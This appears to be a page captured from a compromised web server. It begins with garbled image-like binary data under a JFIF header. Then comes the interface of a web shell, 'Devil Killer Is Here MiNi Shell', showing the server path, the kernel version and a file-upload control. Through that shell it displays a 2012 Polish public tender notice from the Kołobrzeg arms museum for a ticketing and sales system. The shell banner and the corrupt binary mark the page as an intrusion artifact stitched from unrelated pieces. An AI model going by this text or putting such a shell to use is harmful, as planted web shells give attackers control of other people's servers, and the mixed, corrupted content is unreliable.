JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/103736-N-2012.html

<p class="kh_header"><b>Kołobrzeg: dostawa elektronicznego systemu obsługi klienta dla Muzeum Oręża Polskiego w Kołobrzegu</b><br>
<b>Numer ogłoszenia: 103736 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Oręża Polskiego w Kołobrzegu , ul. Armii Krajowej 13, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 0-94 352 52 53, faks 0-94 352 52 54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.kolobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa elektronicznego systemu obsługi klienta dla Muzeum Oręża Polskiego w Kołobrzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elektronicznego systemu obsługi klienta dla Muzeum Oręża Polskiego w Kołobrzegu , zgodnie z opisem przedmiotu zamówienia
OPIS PRZEDMIOTU ZAMÓWIENIAI. Ogólne założenia:Podstawowym zadaniem Systemu obsługi klienta jest usprawnienie procedur związanych z zakupem biletów,  na wszystkie możliwe wydarzenia płatne i bezpłatne oraz sprzedaży pamiątek, publikacji itp.organizowanych na terenie Muzeum Oręża Polskiego w Kołobrzegu.   Całość systemu ma być zwarta, modułowa i zarządzana z poziomu administracyjnego oparta o serwer i stacje klienckie.Oprogramowanie oraz sprzęt ma  być tak  skalowalny, aby w razie wystąpienia  zakupu nowych stanowisk nie trzeba było przeprogramowywać całej bazy.II. Wymagania i okoliczności mogące mieć wpływ na sporządzenie oferty: Oprogramowanie może być zainstalowane na serwerze pracującym pod kontrolą darmowego systemu operacyjnego. III. III. Ogólne założenia oprogramowania:1) możliwość zarządzania systemem (uruchomienie modułu administracyjnego) z każdego komputera w sieci lokalnej bez konieczności instalowania (preferowany sposób działania modułu administracyjnego poprzez przeglądarkę internetową  oraz pochodne bazujące na silnikach tych przeglądarek),2) Języki - obsługa dowolnej liczby języków obcych:a) możliwość określenia w jakich językach można podawać nazwy i opisy wydarzeń, pozycji cennika i innych elementów systemu b) możliwość określenia w jakich językach ma odbywać się kontakt z klientem,c) możliwość określenia w jakich językach może odbywać się oprowadzanie przez przewodnika,3) Wydarzenia - wydarzenia, które organizowane są przez Zamawiającego (zwiedzanie, spotkanie, konferencja itd.)a) możliwość utworzenia i zarządzania dowolną liczbą wydarzeń,b) możliwość przeniesienia wydarzenia do archiwum (takie wydarzenie jest pamiętane w systemie ale nie pojawia się w module sprzedaży czy innych funkcjach systemu dotyczących bieżącej pracy),4) Terminy - konkretne daty i godziny rozpoczęcia zdefiniowanych wcześniej wydarzeń:a) bilety na każdy z terminów mogą być sprzedawane w różnych cenach (np. weekendy tańsze,  rocznice, itp.),b) możliwość tworzenia terminów przy pomocy szablonów (np. utworzenie terminu codziennie w konkretne dni tygodnia o ustalonej porze z konkretnymi pozycjami cennika),5) Pracownicy - osoby, które mają dostęp do systemu: możliwość tworzenia pracowników i przypisywanie im uprawnień do poszczególnych funkcji systemu,6) Pozycje cennika - konkretna cena i nazwa sprzedawanego biletu:a) możliwość definiowania dowolnej ilości pozycji cennika - obsługiwane pola:nazwa,symbol PKWiU,cena brutto,stawka VAT,układ informacji drukowanych na bilecie (każda pozycja cennika może mieć zdefiniowany inny układ informacji drukowanych na bilecie),widoczność pozycji cennika w poszczególnych grupach miejsc ,b) możliwość zdefiniowania pozycji cennika z ceną 0 zł,c) możliwość ustalania kolejności pozycji cennika,7) Towary i usługi - poza biletami moduł sprzedaży powinien umożliwiać sprzedaż towarów  i usług :a) obsługiwane pola towaru lub usługi:nazwa,symbol PKWiU,cena brutto,stawka VAT,jednostka miary,symbol (kod kreskowy)8) Punkt kontroli - miejsce, w którym kontrolowane będą bilety,9) Historia - każda funkcja wykonana w systemie powinna być zapisywana wraz z datą i osobą, która wykonała tą funkcję; ma to umożliwić przeglądanie działań użytkowników w systemie10) W celu dokładnego opisania oczekiwanej funkcjonalności oprogramowania Zamawiający podzielił specyfikację na następujące moduły funkcjonalne:1) moduł Sprzedażowy - część systemu umożliwiająca wykonania wszelkich operacji związanych z obsługą zakupu biletów i towarów przez klienta,2) moduł Administracyjny - część systemu umożliwiająca konfigurację całego systemu,3) moduł Kontroli biletów-część systemu umożliwiająca sprawdzenie poprawności biletów przy wejściu do obiektu,
4) moduł Raportowania - część systemu umożliwiająca tworzenie raportów.
Moduł Sprzedażowy:- ilość 3. 1) oprogramowanie musi pozwalać na zdefiniowanie (może być na sztywno podczas wdrożenia z możliwością późniejszej zmiany) dowolnej ilości różnego rodzaju numeracji dokumentów takich jak: faktura vat, faktura korekta, paragon  - dla każdego typu dokumentu osobna numeracja,
2) automatyczne (kasjer wybiera jedynie ilość biletów,formę płatności,dane do faktury)tworzenie i numerowanie dokumentów sprzedaży: paragonów i faktur VAT,
3)paragony muszą być automatycznie fiskalizowane na drukarce fiskalnej w chwili sprzedaży; na paragonie musi drukować się numer paragonu nadany przez oprogramowanie,4)oprogramowanie musi ostrzegać o paragonach, które nie zostały zafiskalizowane,5)możliwość sprzedaży w ramach jednej transakcji biletów na wybrane wydarzenie (termin) oraz towarów i usług,6)obsługa następujących form płatności:a)gotówka (zawsze dostępna),b) przelew (jedynie dla konkretnych zdefiniowanych kontrahentów),7)możliwość zwrotu towarów lub biletów:
a)zakupionych na paragon, pod warunkiem, że w chwili zwrotu klient posiada określoną ilość biletów lub towar,  automatyczne utworzenie i zafiskalizowanie nowego paragonu na posiadaną przez klienta ilość biletów i towar.b)zakupionych na fakturę, w chwili zwrotu automatyczne utworzenie faktury korekty,c)możliwość przeprowadzenia zwrotu poprzez zeskanowanie czytnikiem kodów kreskowych kodu z dokumentu sprzedaży (faktura VAT lub paragon) lub biletu,8)możliwość wystawienia faktury do paragonów (również poprzez zeskanowanie kodów kreskowych tych paragonów),9)możliwość łączenia kontrahentów powtarzających się w systemie w jednego, bez straty danych o ich historii,10)możliwość wyszukania dokumentu poprzez zeskanowanie jego kodu kreskowego,11)możliwość ręcznego zafiskalizowania dokumentu, który nie został zafiskalizowany automatycznie,12)podczas wyboru kontrahenta do transakcji możliwość wyszukania kontrahenta po NIP-ie, symbolu lub nazwie,13)generowanie zestawienia dokumentów na podstawie daty, typu, formy płatności, stanowiska i kasjera14) generowania raportu zawierającego sumaryczną sprzedaż i zwroty (netto, brutto i VAT)dla różnych rodzajów biletów oraz towarów i usług na podstawie daty sprzedaży, typu dokumentu, formy płatności, stanowiska i kasjera,15)osoba obsługująca moduł Sprzedażowy nie może mieć żadnej możliwości zamiany cen biletów czy towarów i usług,16)generowanie dziennych raportów fiskalnych umożliwiających rozliczenie utargu kasjera,17) funkcja ponownego wydruku biletów do każdego dokumentu sprzedaży na wypadek uszkodzenia drukarki biletów,18)funkcja wystawienia duplikatu faktury VAT,19)możliwość wpisania uwagi na fakturę w chwili sprzedaży,20)możliwość wydrukowania zestawienia kupionych biletów zamiast drukowania pojedynczych biletów (w chwili sprzedaży),21)możliwość współpracy z monitorem dotykowym 15 (duże przyciski, wirtualna klawiatura minimum numeryczna),22)możliwość korekty danych kontrahenta na fakturze.Moduł Administracyjny: - ilość 1.1) tworzenie raportów frekwencji:a) zapis raportu w postaci pliku pdf,b) możliwość wyboru następujących kryteriów:dla określonego wydarzenia,w podanym zakresie dat,w określone dni tygodnia (możliwość wybrania tylko poniedziałków lub np. wtorków i piątków)określenie ilości zwiedzających z rozróżnieniem na grupy (np. dorośli, dzieci, młodzież, emeryci, grupy, osoby indywidualne)2)możliwość indywidualnej zmiany układu menu dostępnego dla użytkowników (inne pogrupowanie funkcji),3)możliwość grupowej edycji terminów:a)grupowa zmiana cenników,b) grupowa zmiana widoczności terminów w poszczególnych modułach (ilość dni od - do)4) możliwość przypisywania stanowiskom kasowym numeracji 5) przeglądanie historii działań w systemie z opcją filtrowania,6)zarządzanie terminami,7)zarządzanie szablonami terminów,8)zarządzanie wydarzeniami,9)zarządzanie cennikami,10)zarządzanie kontrolą biletów:a) możliwość określenia punktów kontroli biletów
Moduł Kontroli biletów: - ilość 2.1)możliwość kontroli biletów za pomocą urządzeń przenośnych typu palmtop,2)komunikacja urządzenia z serwerem za pomocą sieci bezprzewodowej,3)możliwość obsługi modułu bez konieczności posługiwania się klawiaturą urządzenia (wszystkie funkcje muszą być realizowane za pomocą ekranu dotykowego),4)możliwość wyboru punktu kontroli,5)definiowanie parametrów kontroli biletów w module Administracyjnym,6)dźwiękowa sygnalizacja poprawnego i niepoprawnego biletu,7)możliwość ustawienia stanowiska jak punkt rejestracji wyjścia,8) możliwość takiego skonfigurowania kontroli, aby możliwe było określanie ile osób znajduje się aktualnie w danej strefie.Moduł Raportowania:-ilość 1.
1)dedykowany moduł do generowania raportów bez limitu zainstalowanych kopii,
2)możliwość zapisania każdego wygenerowanego raportu do pliku pdf oraz xls,
3)każdy raport powinien zawierać datę, godzinę i osobę, która go sporządziła,
4)generowanie następujących zestawień:5)zestawienie zwrotów kasjerów,
6)zestawienie dokumentów (możliwość wyboru dat, typów dokumentów),7)frekwencja biletów (liczona wg zarezerwowanych i sprzedanych biletów oraz sprawdzonych biletów)8) raporty dobowe, okresowe kasjerów przedstawiające salda gotówki każdego z kasjerówIV. Wymagania związane z urządzeniami:1) Zestaw  komputer kasowy (do stanowiska kasowego) :-szt. 3 wraz z systemem operacyjnym spełniającym wymogi systemu biletowo- sprzedażowego  Microsoft Office szt. 32) Gwarancja na komputery 36 miesięcy w systemie Door to Door.3) Procesor + wentylatorco najmniej dwurdzeniowy wykonany w technologii 32nm ; pamięcią cache L2 - 2 MB lub większą;  częstotliwość procesowa min. 3 GHz; zestaw chłodzący (radiator + wentylator gwarantujące pracę w temperaturze bezpiecznej dla procesora).4)Pamięć RAM typ pamięci Non-ECCO; rodzaj - DDR3; co najmniej 2 GB; o częstotliwości taktowania 1333 MHz współpracujący z płytą główną.5)Dysk Twardy pojemność minimum 320 GB, interfejs SATA.6) Płyta główna wyposażona w co najmniej cztery gniazda pamięci DDR3 w technologii Non-ECC; zintegrowana gigabitowa karta sieciowa; zintegrowana karta dźwiękowa; zintegrowana karta graficzna; posiadająca co najmniej 1 złącze PCI-E 16X;posiadająca co najmniej 10 złączy USB 2.0.7)Napęd Nagrywarka DVD obsługująca standardy DVD+R, DVD-R.8)Obudowa: Small Desktop w kolorze czarnym z zasilaczem aktywnym minimum 400 Wat obsługującym płytę główną;4 portami USB na panelu przednim i 6 portami USB na panelu tylnim,9)Inne:wzestawie musi się znaleźć klawiatura i myszka10) System operacyjny: Umożliwiający bezproblemową pracę pakietowi programów biurowych będącego częścią niniejszego zestawu (opisany poniżej).11)UPS  Czas podtrzymania przy obciążeniu 100%: minimum 3,5 min.; liczba gniazd z potrzymaniem 4 x PL (10A); Liczba, typ gniazd wyj. z ochroną antyprzepięciową:  4  x PL (10A); posiada zimny start; zakres napięcia wyjściowego w trybie podstawowym od 180-266 V; typ obudowy desktop;12) Monitor ekran dotykowy z zabezpieczeniem przed zalaniem o przekątnej 15TFT , nominalna rozdzielczość przy odświeżaniu 75 Hz- minimum 1024x768, posiadający złącze 1 x USB, 1 x D-SUB-15, kolor grafitowy,posiada certyfikaty CE, MPRII, wbudowany zasilacz;13) Drukarka biletów-etykiet z obcinaczem:-szt. 3 przemysłowa termotransferowa drukarka etykiet o prędkości druku 200-300mm/s,maksymalna szerokość druku 104mm, rozdzielczość 203 dpi, szerokość etykiet: max 118 mm, min. 25,4 mm, maksymalna średnica rolki 208,3 mm,możliwość wydruku kodów kreskowych CODE3OF9,2OF5, EAN8,obsługa papieru o grubości do 300 g/m2,możliwość zmiany materiałów eksploatacyjnych bez konieczności używania narzędzi,możliwość konfiguracji wszystkich ustawień z poziomu komputera podłączonego do takiej drukarki,możliwość rozpoznawania końca biletu jako szczelina (gap) lub czarny marker (black point),gwarancja na drukarkę minimum 2 lata,obudowa metalowa,14)Drukarka faktur oraz raportów: - szt. 3 Umożliwiająca wydruki monochromatyczne, poprawnie działająca pod systemami operacyjnymi w wersjach x86 oraz x64, posiadająca interfejs USB działający w standardzie 2.0, podajnik arkuszy A4 mieszczący minimum 150 arkuszy, umożliwiająca wydruk na papierze formatu A4 o gramaturze w zakresie pomiędzy 60 a 163 g/m2 - g/m2, i z prędkością minimum 17 stron mono A4 na minutę, posiadająca zainstalowaną pamięć w ilości nie mniej niż 2MB a jej obciążenie miesięczne przewidziane jest na nie mniej niż 5000 stron wraz z kompatybilnymi materiałami eksploatacyjnymi (tonerami) o zwiększonej wydajności; kabel USB o długości minimum 1,8 m współpracujący z urządzeniem,Drukarka fiskalna: - szt. 3 moduł kopii elektronicznej na karcie SD, wyświetlacz dla klienta LCD , ilość znaków w wierszu co najmniej 40, długość rolki co najmniej 60 oraz szybkość wydruku 150mm/s, interfejs USB.15) Szuflada na pieniądze - szt. 2 metalowe prowadnice, kolor obudowy czarny, 8 przegród na banknoty dostosowane do polskich banknotów i banknotów EURO, otwierana poleceniem z kasy, wysokość nie większa niż 13 cm, szerokość nie większa niż 420 cm,wyjmowany pojemnik na bilon, możliwość montażu szuflady pod blatem16) Palmtop do kontroli biletów - szt. 2 przenośny terminal z komunikacją radiową, dedykowany do zastosowań w handlu i magazynie, musi być kompatybilny z modułem kontroli systemu sprzedaży biletów; niewielka waga do 300 g, przystosowany do pracy w ciężkich warunkach (norma IP54) i odporny na upadki z wysokości 1,2 m, dodatkowo dostępne gniazdo Micro Secure Digital umożliwia rozszerzenie pamięci, wyposażono w system operacyjny , duży wyświetlacz z ekranem dotykowym i klawiaturę alfanumeryczną (23 klawisze), wbudowany laserowy czytnik kodów  - przy poprawnym odczycie na skanowanym kodzie czytnik wyświetla, sygnalizuje informację np. zielony punkt.dodatkowe elementy to: stacja dokująca pozwalająca podłączyć palmtop   do komputera przez kabel USB lub Ethernet,-szt.2, dodatkowe baterie litowe -2 szt.,17)Czytnik kodów kreskowych:-szt. 3 odczytujący wszystkie standardowe kody jednowymiarowe z źródłem światła: laser od długości fali 650,kształt promienia - 1 linia skanująca, sygnalizacja dźwiękowa i optyczna, dostępne interfejsy  USB, wymagalny kontrast kodu 35%, obudowa plastikowa18)Specyfikacja biletów:Nakład 50 000(30000 i 20000 różniące się stroną CMYK, rewers pozostaje bez zmian) konfekcja zgodna z dostarczonymi drukarkami biletów, przeznaczone do cięcia gilotyną, kolorystyka 4+1,gramatura papieru(220 g),rozmiar biletu:wysokość( 110 mm )xszerokość(50 mm)19)Wymagania Pozostałe:1)System zostanie wdrożony w siedzibie Zamawiającego w miejscach wyznaczonych; charakterystyka potrzebnych w tym celu mediów: odpowiedniego poboru mocy, dostępu do sieci wewnętrznej (ilości potrzebnych przyłączy) zostanie określona po podpisaniu umowy;2)Wykonawca uwzględni dostateczną ilość godzin szkoleń dla pracowników obsługujących system obsługi klienta zapewniającą sprawną obsługę systemu przez pracowników Muzeum  ustali harmonogram, który będzie integralną częścią umowy;3)Wykonawca zapewni zdalną (telefon, mail lub przez pulpit zdalny) pomoc po wdrożeniu systemu przez okres 24 miesięcy w godzinach pracy Muzeum;4)Wykonawca przeszkoli wskazanego pracownika w zakresie archiwizacji oprogramowania, tak aby można było uruchomić system po awarii bez potrzeby wzywania serwisu;5)Wykonawca przeszkoli1pracownika Działu Finansowego w zakresie pracy działu z systemem; 
6)Wykonawca zagwarantuje przez okres 24 miesięcy wymianę wadliwego sprzętu będącego przedmiotem w/w specyfikacji na zasadzie dostarczenia urządzenia zastępczego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie wiedzy i doświadczenia, tj.w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie-zrealizowanie co najmniej jednego zamówienia, którego przedmiotem była dostawa elektronicznego systemu obsługi klienta dla instytucji kultury(na. muzeum, teatr, dom kultury)obejmujacego co najmniej następujące funkcjonalności:sprzedaż biletów, pamiatek, wydawnictw itp.,komunikacja z system finansowo-księgowym, o wartości nie mniejszej niz 50000 zł netto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełniony formularz oferty z wykorzystaniem wzoru -załącznik nr2 do SIWZ
podpisane oswiadczenia z wykorzystaniem wzoru - załącznik nr 1 do SIWZ, wypełniony wykaz dostaw -załącznik nr 5 do SIWZ</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany w umowie na podstawie art.144 ustawy Pzp w nastepujacych styacjach:zmiany sposobu realizacji zamówienia wynikającej ze zmian w obowiazujących przepisach prawa majacych wpływ na realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mopkkolobrzeg.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.muzeum.kolobrzeg.pl.</p>
